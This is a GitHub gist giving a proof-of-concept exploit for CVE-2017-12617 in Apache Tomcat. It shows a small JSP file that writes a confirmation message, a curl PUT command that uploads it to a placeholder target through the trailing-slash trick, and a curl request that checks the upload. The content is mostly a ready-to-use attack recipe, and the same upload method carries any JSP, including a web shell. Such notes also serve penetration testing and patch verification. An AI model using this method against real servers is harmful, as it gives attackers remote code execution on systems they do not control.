Skip to content

Instantly share code, notes, and snippets.

@P3t3rp4rk3r

P3t3rp4rk3r/CVE-2017-12617.md

Created October 10, 2017 15:07
Show Gist options
  • Save P3t3rp4rk3r/f57635974b3e40dc8c97689b8e2a767d to your computer and use it in GitHub Desktop.
Save P3t3rp4rk3r/f57635974b3e40dc8c97689b8e2a767d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
CVE-2017-12617.md

Exploit using 'curl':

Create a .jsp file (e.g. test.jsp):

<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>

Perform the curl command on target server:

curl -X PUT http://target:port/test.jsp/ -d @- < test.jsp

Check if your file is uploaded by browsing to the target address or:

curl http://targe:port/test.jsp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment